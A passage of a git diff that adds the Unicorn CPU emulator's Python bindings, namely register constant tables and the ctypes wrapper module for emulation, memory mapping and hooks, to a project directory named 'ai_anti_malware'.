+UC_MIPS_REG_S3 = 21 +UC_MIPS_REG_S4 = 22 +UC_MIPS_REG_S5 = 23 +UC_MIPS_REG_S6 = 24 +UC_MIPS_REG_S7 = 25 +UC_MIPS_REG_T8 = 26 +UC_MIPS_REG_T9 = 27 +UC_MIPS_REG_K0 = 28 +UC_MIPS_REG_K1 = 29 +UC_MIPS_REG_GP = 30 +UC_MIPS_REG_SP = 31 +UC_MIPS_REG_FP = 32 +UC_MIPS_REG_S8 = 32 +UC_MIPS_REG_RA = 33 +UC_MIPS_REG_HI0 = 45 +UC_MIPS_REG_HI1 = 46 +UC_MIPS_REG_HI2 = 47 +UC_MIPS_REG_HI3 = 48 +UC_MIPS_REG_LO0 = 45 +UC_MIPS_REG_LO1 = 46 +UC_MIPS_REG_LO2 = 47 +UC_MIPS_REG_LO3 = 48 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py new file mode 100644 index 0000000..7bd326d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py @@ -0,0 +1,96 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.py] + +# SPARC registers + +UC_SPARC_REG_INVALID = 0 +UC_SPARC_REG_F0 = 1 +UC_SPARC_REG_F1 = 2 +UC_SPARC_REG_F2 = 3 +UC_SPARC_REG_F3 = 4 +UC_SPARC_REG_F4 = 5 +UC_SPARC_REG_F5 = 6 +UC_SPARC_REG_F6 = 7 +UC_SPARC_REG_F7 = 8 +UC_SPARC_REG_F8 = 9 +UC_SPARC_REG_F9 = 10 +UC_SPARC_REG_F10 = 11 +UC_SPARC_REG_F11 = 12 +UC_SPARC_REG_F12 = 13 +UC_SPARC_REG_F13 = 14 +UC_SPARC_REG_F14 = 15 +UC_SPARC_REG_F15 = 16 +UC_SPARC_REG_F16 = 17 +UC_SPARC_REG_F17 = 18 +UC_SPARC_REG_F18 = 19 +UC_SPARC_REG_F19 = 20 +UC_SPARC_REG_F20 = 21 +UC_SPARC_REG_F21 = 22 +UC_SPARC_REG_F22 = 23 +UC_SPARC_REG_F23 = 24 +UC_SPARC_REG_F24 = 25 +UC_SPARC_REG_F25 = 26 +UC_SPARC_REG_F26 = 27 +UC_SPARC_REG_F27 = 28 +UC_SPARC_REG_F28 = 29 +UC_SPARC_REG_F29 = 30 +UC_SPARC_REG_F30 = 31 +UC_SPARC_REG_F31 = 32 +UC_SPARC_REG_F32 = 33 +UC_SPARC_REG_F34 = 34 +UC_SPARC_REG_F36 = 35 +UC_SPARC_REG_F38 = 36 +UC_SPARC_REG_F40 = 37 +UC_SPARC_REG_F42 = 38 +UC_SPARC_REG_F44 = 39 +UC_SPARC_REG_F46 = 40 +UC_SPARC_REG_F48 = 41 +UC_SPARC_REG_F50 = 42 +UC_SPARC_REG_F52 = 43 +UC_SPARC_REG_F54 = 44 +UC_SPARC_REG_F56 = 45 +UC_SPARC_REG_F58 = 46 +UC_SPARC_REG_F60 = 47 +UC_SPARC_REG_F62 = 48 +UC_SPARC_REG_FCC0 = 49 +UC_SPARC_REG_FCC1 = 50 +UC_SPARC_REG_FCC2 = 51 +UC_SPARC_REG_FCC3 = 52 +UC_SPARC_REG_G0 = 53 +UC_SPARC_REG_G1 = 54 +UC_SPARC_REG_G2 = 55 +UC_SPARC_REG_G3 = 56 +UC_SPARC_REG_G4 = 57 +UC_SPARC_REG_G5 = 58 +UC_SPARC_REG_G6 = 59 +UC_SPARC_REG_G7 = 60 +UC_SPARC_REG_I0 = 61 +UC_SPARC_REG_I1 = 62 +UC_SPARC_REG_I2 = 63 +UC_SPARC_REG_I3 = 64 +UC_SPARC_REG_I4 = 65 +UC_SPARC_REG_I5 = 66 +UC_SPARC_REG_FP = 67 +UC_SPARC_REG_I7 = 68 +UC_SPARC_REG_ICC = 69 +UC_SPARC_REG_L0 = 70 +UC_SPARC_REG_L1 = 71 +UC_SPARC_REG_L2 = 72 +UC_SPARC_REG_L3 = 73 +UC_SPARC_REG_L4 = 74 +UC_SPARC_REG_L5 = 75 +UC_SPARC_REG_L6 = 76 +UC_SPARC_REG_L7 = 77 +UC_SPARC_REG_O0 = 78 +UC_SPARC_REG_O1 = 79 +UC_SPARC_REG_O2 = 80 +UC_SPARC_REG_O3 = 81 +UC_SPARC_REG_O4 = 82 +UC_SPARC_REG_O5 = 83 +UC_SPARC_REG_SP = 84 +UC_SPARC_REG_O7 = 85 +UC_SPARC_REG_Y = 86 +UC_SPARC_REG_XCC = 87 +UC_SPARC_REG_PC = 88 +UC_SPARC_REG_ENDING = 89 +UC_SPARC_REG_O6 = 84 +UC_SPARC_REG_I6 = 67 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py new file mode 100644 index 0000000..7f76976 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py @@ -0,0 +1,689 @@ +# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com> + +import ctypes +import ctypes.util +import distutils.sysconfig +import pkg_resources +import inspect +import os.path +import sys +import weakref + +from . import x86_const, arm64_const, unicorn_const as uc + +if not hasattr(sys.modules[__name__], "__file__"): + __file__ = inspect.getfile(inspect.currentframe()) + +_python2 = sys.version_info[0] < 3 +if _python2: + range = xrange + +_lib = { 'darwin': 'libunicorn.dylib', + 'win32': 'unicorn.dll', + 'cygwin': 'cygunicorn.dll', + 'linux': 'libunicorn.so', + 'linux2': 'libunicorn.so' } + + +# Windows DLL in dependency order +_all_windows_dlls = ( + "libwinpthread-1.dll", + "libgcc_s_seh-1.dll", + "libgcc_s_dw2-1.dll", +) + +_loaded_windows_dlls = set() + +def _load_win_support(path): + for dll in _all_windows_dlls: + if dll in _loaded_windows_dlls: + continue + + lib_file = os.path.join(path, dll) + if ('/' not in path and '\\' not in path) or os.path.exists(lib_file): + try: + #print('Trying to load Windows library', lib_file) + ctypes.cdll.LoadLibrary(lib_file) + #print('SUCCESS') + _loaded_windows_dlls.add(dll) + except OSError as e: + #print('FAIL to load %s' %lib_file, e) + continue + +# Initial attempt: load all dlls globally +if sys.platform in ('win32', 'cygwin'): + _load_win_support('') + +def _load_lib(path): + try: + if sys.platform in ('win32', 'cygwin'): + _load_win_support(path) + + lib_file = os.path.join(path, _lib.get(sys.platform, 'libunicorn.so')) + #print('Trying to load shared library', lib_file) + dll = ctypes.cdll.LoadLibrary(lib_file) + #print('SUCCESS') + return dll + except OSError as e: + #print('FAIL to load %s' %lib_file, e) + return None + +_uc = None + +# Loading attempts, in order +# - user-provided environment variable +# - pkg_resources can get us the path to the local libraries +# - we can get the path to the local libraries by parsing our filename +# - global load +# - python's lib directory +# - last-gasp attempt at some hardcoded paths on darwin and linux + +_path_list = [os.getenv('LIBUNICORN_PATH', None), + pkg_resources.resource_filename(__name__, 'lib'), + os.path.join(os.path.split(__file__)[0], 'lib'), + '', + distutils.sysconfig.get_python_lib(), + "/usr/local/lib/" if sys.platform == 'darwin' else '/usr/lib64', + os.getenv('PATH', '')] + +#print(_path_list) +#print("-" * 80) + +for _path in _path_list: + if _path is None: continue + _uc = _load_lib(_path) + if _uc is not None: break +else: + raise ImportError("ERROR: fail to load the dynamic library.") + +__version__ = "%u.%u.%u" % (uc.UC_VERSION_MAJOR, uc.UC_VERSION_MINOR, uc.UC_VERSION_EXTRA) + +# setup all the function prototype +def _setup_prototype(lib, fname, restype, *argtypes): + getattr(lib, fname).restype = restype + getattr(lib, fname).argtypes = argtypes + +ucerr = ctypes.c_int +uc_engine = ctypes.c_void_p +uc_context = ctypes.c_void_p +uc_hook_h = ctypes.c_size_t + +class _uc_mem_region(ctypes.Structure): + _fields_ = [ + ("begin", ctypes.c_uint64), + ("end", ctypes.c_uint64), + ("perms", ctypes.c_uint32), + ] + + +_setup_prototype(_uc, "uc_version", ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int)) +_setup_prototype(_uc, "uc_arch_supported", ctypes.c_bool, ctypes.c_int) +_setup_prototype(_uc, "uc_open", ucerr, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine)) +_setup_prototype(_uc, "uc_close", ucerr, uc_engine) +_setup_prototype(_uc, "uc_strerror", ctypes.c_char_p, ucerr) +_setup_prototype(_uc, "uc_errno", ucerr, uc_engine) +_setup_prototype(_uc, "uc_reg_read", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) +_setup_prototype(_uc, "uc_reg_write", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) +_setup_prototype(_uc, "uc_mem_read", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) +_setup_prototype(_uc, "uc_mem_write", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) +_setup_prototype(_uc, "uc_emu_start", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t) +_setup_prototype(_uc, "uc_emu_stop", ucerr, uc_engine) +_setup_prototype(_uc, "uc_hook_del", ucerr, uc_engine, uc_hook_h) +_setup_prototype(_uc, "uc_mem_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) +_setup_prototype(_uc, "uc_mem_map_ptr", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p) +_setup_prototype(_uc, "uc_mem_unmap", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t) +_setup_prototype(_uc, "uc_mem_protect", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) +_setup_prototype(_uc, "uc_query", ucerr, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t)) +_setup_prototype(_uc, "uc_context_alloc", ucerr, uc_engine, ctypes.POINTER(uc_context)) +_setup_prototype(_uc, "uc_free", ucerr, ctypes.c_void_p) +_setup_prototype(_uc, "uc_context_save", ucerr, uc_engine, uc_context) +_setup_prototype(_uc, "uc_context_restore", ucerr, uc_engine, uc_context) +_setup_prototype(_uc, "uc_context_size", ctypes.c_size_t, uc_engine) +_setup_prototype(_uc, "uc_context_free", ucerr, uc_context) +_setup_prototype(_uc, "uc_mem_regions", ucerr, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32)) + +# uc_hook_add is special due to variable number of arguments +_uc.uc_hook_add = _uc.uc_hook_add +_uc.uc_hook_add.restype = ucerr + +UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p) +UC_HOOK_INSN_INVALID_CB = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p) +UC_HOOK_MEM_INVALID_CB = ctypes.CFUNCTYPE( + ctypes.c_bool, uc_engine, ctypes.c_int, + ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p +) +UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE( + None, uc_engine, ctypes.c_int, + ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p +) +UC_HOOK_INTR_CB = ctypes.CFUNCTYPE( + None, uc_engine, ctypes.c_uint32, ctypes.c_void_p +) +UC_HOOK_INSN_IN_CB = ctypes.CFUNCTYPE( + ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p +) +UC_HOOK_INSN_OUT_CB = ctypes.CFUNCTYPE( + None, uc_engine, ctypes.c_uint32, + ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p +) +UC_HOOK_INSN_SYSCALL_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p) + + +# access to error code via @errno of UcError +class UcError(Exception): + def __init__(self, errno): + self.errno = errno + + def __str__(self): + return _uc.uc_strerror(self.errno).decode('ascii') + + +# return the core's version +def uc_version(): + major = ctypes.c_int() + minor = ctypes.c_int() + combined = _uc.uc_version(ctypes.byref(major), ctypes.byref(minor)) + return (major.value, minor.value, combined) + + +# return the binding's version +def version_bind(): + return ( + uc.UC_API_MAJOR, uc.UC_API_MINOR, + (uc.UC_API_MAJOR << 8) + uc.UC_API_MINOR, + ) + + +# check to see if this engine supports a particular arch +def uc_arch_supported(query): + return _uc.uc_arch_supported(query) + + +class uc_x86_mmr(ctypes.Structure): + """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR.""" + _fields_ = [ + ("selector", ctypes.c_uint16), # not used by GDTR and IDTR + ("base", ctypes.c_uint64), # handle 32 or 64 bit CPUs + ("limit", ctypes.c_uint32), + ("flags", ctypes.c_uint32), # not used by GDTR and IDTR + ] + +class uc_x86_msr(ctypes.Structure): + _fields_ = [ + ("rid", ctypes.c_uint32), + ("value", ctypes.c_uint64), + ] + +class uc_x86_float80(ctypes.Structure): + """Float80""" + _fields_ = [ + ("mantissa", ctypes.c_uint64), + ("exponent", ctypes.c_uint16), + ] + + +class uc_x86_xmm(ctypes.Structure): + """128-bit xmm register""" + _fields_ = [ + ("low_qword", ctypes.c_uint64), + ("high_qword", ctypes.c_uint64), + ] + +class uc_x86_ymm(ctypes.Structure): + """256-bit ymm register""" + _fields_ = [ + ("first_qword", ctypes.c_uint64), + ("second_qword", ctypes.c_uint64), + ("third_qword", ctypes.c_uint64), + ("fourth_qword", ctypes.c_uint64), + ] + +class uc_arm64_neon128(ctypes.Structure): + """128-bit neon register""" + _fields_ = [ + ("low_qword", ctypes.c_uint64), + ("high_qword", ctypes.c_uint64), + ] + +# Subclassing ref to allow property assignment. +class UcRef(weakref.ref): + pass + +# This class tracks Uc instance destruction and releases handles. +class UcCleanupManager(object): + def __init__(self): + self._refs = {} + + def register(self, uc): + ref = UcRef(uc, self._finalizer) + ref._uch = uc._uch + ref._class = uc.__class__ + self._refs[id(ref)] = ref + + def _finalizer(self, ref): + # note: this method must be completely self-contained and cannot have any references + # to anything else in this module. + # + # This is because it may be called late in the Python interpreter's shutdown phase, at + # which point the module's variables may already have been deinitialized and set to None. + # + # Not respecting that can lead to errors such as: + # Exception AttributeError: + # "'NoneType' object has no attribute 'release_handle'" + # in <bound method UcCleanupManager._finalizer of + # <unicorn.unicorn.UcCleanupManager object at 0x7f0bb83e4310>> ignored + # + # For that reason, we do not try to access the `Uc` class directly here but instead use + # the saved `._class` reference. + del self._refs[id(ref)] + ref._class.release_handle(ref._uch) + +class Uc(object): + _cleanup = UcCleanupManager() + + def __init__(self, arch, mode): + # verify version compatibility with the core before doing anything + (major, minor, _combined) = uc_version() + if major != uc.UC_API_MAJOR or minor != uc.UC_API_MINOR: + self._uch = None + # our binding version is different from the core's API version + raise UcError(uc.UC_ERR_VERSION) + + self._arch, self._mode = arch, mode + self._uch = ctypes.c_void_p() + status = _uc.uc_open(arch, mode, ctypes.byref(self._uch)) + if status != uc.UC_ERR_OK: + self._uch = None + raise UcError(status) + # internal mapping table to save callback & userdata + self._callbacks = {} + self._ctype_cbs = {} + self._callback_count = 0 + self._cleanup.register(self) + + @staticmethod + def release_handle(uch): + if uch: + try: + status = _uc.uc_close(uch) + if status != uc.UC_ERR_OK: + raise UcError(status) + except: # _uc might be pulled from under our feet + pass + + # emulate from @begin, and stop when reaching address @until + def emu_start(self, begin, until, timeout=0, count=0): + status = _uc.uc_emu_start(self._uch, begin, until, timeout, count) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # stop emulation + def emu_stop(self): + status = _uc.uc_emu_stop(self._uch) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # return the value of a register + def reg_read(self, reg_id, opt=None): + if self._arch == uc.UC_ARCH_X86: + if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: + reg = uc_x86_mmr() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.selector, reg.base, reg.limit, reg.flags + if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): + reg = uc_x86_float80() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.mantissa, reg.exponent + if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): + reg = uc_x86_xmm() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.low_qword | (reg.high_qword << 64) + if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): + reg = uc_x86_ymm() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.first_qword | (reg.second_qword << 64) | (reg.third_qword << 128) | (reg.fourth_qword << 192) + if reg_id is x86_const.UC_X86_REG_MSR: + if opt is None: + raise UcError(uc.UC_ERR_ARG) + reg = uc_x86_msr() + reg.rid = opt + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.value + + if self._arch == uc.UC_ARCH_ARM64: + if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): + reg = uc_arm64_neon128() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.low_qword | (reg.high_qword << 64) + + # read to 64bit number to be safe + reg = ctypes.c_uint64(0) + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.value + + # write to a register + def reg_write(self, reg_id, value): + reg = None + + if self._arch == uc.UC_ARCH_X86: + if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: + assert isinstance(value, tuple) and len(value) == 4 + reg = uc_x86_mmr() + reg.selector = value[0] + reg.base = value[1] + reg.limit = value[2] + reg.flags = value[3] + if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): + reg = uc_x86_float80() + reg.mantissa = value[0] + reg.exponent = value[1] + if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): + reg = uc_x86_xmm() + reg.low_qword = value & 0xffffffffffffffff + reg.high_qword = value >> 64 + if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): + reg = uc_x86_ymm() + reg.first_qword = value & 0xffffffffffffffff + reg.second_qword = (value >> 64) & 0xffffffffffffffff + reg.third_qword = (value >> 128) & 0xffffffffffffffff + reg.fourth_qword = value >> 192 + if reg_id is x86_const.UC_X86_REG_MSR: + reg = uc_x86_msr() + reg.rid = value[0] + reg.value = value[1] + + if self._arch == uc.UC_ARCH_ARM64: + if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): + reg = uc_arm64_neon128() + reg.low_qword = value & 0xffffffffffffffff + reg.high_qword = value >> 64 + + if reg is None: + # convert to 64bit number to be safe + reg = ctypes.c_uint64(value) + + status = _uc.uc_reg_write(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # read from MSR - X86 only + def msr_read(self, msr_id): + return self.reg_read(x86_const.UC_X86_REG_MSR, msr_id) + + # write to MSR - X86 only + def msr_write(self, msr_id, value): + return self.reg_write(x86_const.UC_X86_REG_MSR, (msr_id, value)) + + # read data from memory + def mem_read(self, address, size): + data = ctypes.create_string_buffer(size) + status = _uc.uc_mem_read(self._uch, address, data, size) + if status != uc.UC_ERR_OK: + raise UcError(status) + return bytearray(data) + + # write to memory + def mem_write(self, address, data): + status = _uc.uc_mem_write(self._uch, address, data, len(data)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # map a range of memory + def mem_map(self, address, size, perms=uc.UC_PROT_ALL): + status = _uc.uc_mem_map(self._uch, address, size, perms) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # map a range of memory from a raw host memory address + def mem_map_ptr(self, address, size, perms, ptr): + status = _uc.uc_mem_map_ptr(self._uch, address, size, perms, ptr) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # unmap a range of memory + def mem_unmap(self, address, size): + status = _uc.uc_mem_unmap(self._uch, address, size) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # protect a range of memory + def mem_protect(self, address, size, perms=uc.UC_PROT_ALL): + status = _uc.uc_mem_protect(self._uch, address, size, perms) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # return CPU mode at runtime + def query(self, query_mode): + result = ctypes.c_size_t(0) + status = _uc.uc_query(self._uch, query_mode, ctypes.byref(result)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return result.value + + def _hookcode_cb(self, handle, address, size, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, address, size, data) + + def _hook_mem_invalid_cb(self, handle, access, address, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return cb(self, access, address, size, value, data) + + def _hook_mem_access_cb(self, handle, access, address, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, access, address, size, value, data) + + def _hook_intr_cb(self, handle, intno, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, intno, data) + + def _hook_insn_invalid_cb(self, handle, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return cb(self, data) + + def _hook_insn_in_cb(self, handle, port, size, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return cb(self, port, size, data) + + def _hook_insn_out_cb(self, handle, port, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, port, size, value, data) + + def _hook_insn_syscall_cb(self, handle, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, data) + + # add a hook + def hook_add(self, htype, callback, user_data=None, begin=1, end=0, arg1=0): + _h2 = uc_hook_h() + + # save callback & user_data + self._callback_count += 1 + self._callbacks[self._callback_count] = (callback, user_data) + cb = None + + if htype == uc.UC_HOOK_INSN: + insn = ctypes.c_int(arg1) + if arg1 == x86_const.UC_X86_INS_IN: # IN instruction + cb = ctypes.cast(UC_HOOK_INSN_IN_CB(self._hook_insn_in_cb), UC_HOOK_INSN_IN_CB) + if arg1 == x86_const.UC_X86_INS_OUT: # OUT instruction + cb = ctypes.cast(UC_HOOK_INSN_OUT_CB(self._hook_insn_out_cb), UC_HOOK_INSN_OUT_CB) + if arg1 in (x86_const.UC_X86_INS_SYSCALL, x86_const.UC_X86_INS_SYSENTER): # SYSCALL/SYSENTER instruction + cb = ctypes.cast(UC_HOOK_INSN_SYSCALL_CB(self._hook_insn_syscall_cb), UC_HOOK_INSN_SYSCALL_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end), insn + ) + elif htype == uc.UC_HOOK_INTR: + cb = ctypes.cast(UC_HOOK_INTR_CB(self._hook_intr_cb), UC_HOOK_INTR_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + elif htype == uc.UC_HOOK_INSN_INVALID: + cb = ctypes.cast(UC_HOOK_INSN_INVALID_CB(self._hook_insn_invalid_cb), UC_HOOK_INSN_INVALID_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + else: + if htype in (uc.UC_HOOK_BLOCK, uc.UC_HOOK_CODE): + # set callback with wrapper, so it can be called + # with this object as param + cb = ctypes.cast(UC_HOOK_CODE_CB(self._hookcode_cb), UC_HOOK_CODE_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + elif htype & (uc.UC_HOOK_MEM_READ_UNMAPPED | + uc.UC_HOOK_MEM_WRITE_UNMAPPED | + uc.UC_HOOK_MEM_FETCH_UNMAPPED | + uc.UC_HOOK_MEM_READ_PROT | + uc.UC_HOOK_MEM_WRITE_PROT | + uc.UC_HOOK_MEM_FETCH_PROT): + cb = ctypes.cast(UC_HOOK_MEM_INVALID_CB(self._hook_mem_invalid_cb), UC_HOOK_MEM_INVALID_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + else: + cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(self._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + + # save the ctype function so gc will leave it alone. + self._ctype_cbs[self._callback_count] = cb + + if status != uc.UC_ERR_OK: + raise UcError(status) + + return _h2.value + + # delete a hook + def hook_del(self, h): + _h = uc_hook_h(h) + status = _uc.uc_hook_del(self._uch, _h) + if status != uc.UC_ERR_OK: + raise UcError(status) + h = 0 + + def context_save(self): + context = UcContext(self._uch) + status = _uc.uc_context_save(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + return context + + def context_update(self, context): + status = _uc.uc_context_save(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + def context_restore(self, context): + status = _uc.uc_context_restore(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # this returns a generator of regions in the form (begin, end, perms) + def mem_regions(self): + regions = ctypes.POINTER(_uc_mem_region)() + count = ctypes.c_uint32() + status = _uc.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + try: + for i in range(count.value): + yield (regions[i].begin, regions[i].end, regions[i].perms) + finally: + _uc.uc_free(regions) + + +class UcContext: + def __init__(self, h): + self._context = uc_context() + self._size = _uc.uc_context_size(h) + self._to_free = True + status = _uc.uc_context_alloc(h, ctypes.byref(self._context)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + @property + def context(self): + return self._context + + @property + def size(self): + return self._size + + # Make UcContext picklable + def __getstate__(self): + return (bytes(self), self.size) + + def __setstate__(self, state): + self._size = state[1] + self._context = ctypes.cast(ctypes.create_string_buffer(state[0], self._size), uc_context) + # __init__ won'e be invoked, so we are safe to set it here. + self._to_free = False + + def __bytes__(self): + return ctypes.string_at(self.context, self.size) + + def __del__(self): + # We need this property since we shouldn't free it if the object is constructed from pickled bytes. + if self._to_free: + _uc.uc_context_free(self._context) + + +# print out debugging info +def debug(): + archs = { + "arm": uc.UC_ARCH_ARM, + "arm64": uc.UC_ARCH_ARM64, + "mips": uc.UC_ARCH_MIPS, + "sparc": uc.UC_ARCH_SPARC, + "m68k": uc.UC_ARCH_M68K, + "x86": uc.UC_ARCH_X86, + } + + all_archs = "" + keys = archs.keys() + for k in sorted(keys): + if uc_arch_supported(archs[k]): + all_archs += "-%s" % k + + major, minor, _combined = uc_version() + + return "python-%s-c%u.%u-b%u.%u" % ( + all_archs, major, minor, uc.UC_API_MAJOR, uc.UC_API_MINOR + ) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py new file mode 100644 index 0000000..54e2c95 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py @@ -0,0 +1,108 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.py] +UC_API_MAJOR = 1 + +UC_API_MINOR = 0 +UC_VERSION_MAJOR = 1 + +UC_VERSION_MINOR = 0 +UC_VERSION_EXTRA = 2 +UC_SECOND_SCALE = 1000000 +UC_MILISECOND_SCALE = 1000 +UC_ARCH_ARM = 1 +UC_ARCH_ARM64 = 2 +UC_ARCH_MIPS = 3 +UC_ARCH_X86 = 4 +UC_ARCH_PPC = 5 +UC_ARCH_SPARC = 6 +UC_ARCH_M68K = 7 +UC_ARCH_MAX = 8 + +UC_MODE_LITTLE_ENDIAN = 0 +UC_MODE_BIG_ENDIAN = 1073741824 + +UC_MODE_ARM = 0 +UC_MODE_THUMB = 16 +UC_MODE_MCLASS = 32 +UC_MODE_V8 = 64 +UC_MODE_ARM926 = 128 +UC_MODE_ARM946 = 256 +UC_MODE_ARM1176 = 512 +UC_MODE_MICRO = 16 +UC_MODE_MIPS3 = 32 +UC_MODE_MIPS32R6 = 64 +UC_MODE_MIPS32 = 4 +UC_MODE_MIPS64 = 8 +UC_MODE_16 = 2 +UC_MODE_32 = 4 +UC_MODE_64 = 8 +UC_MODE_PPC32 = 4 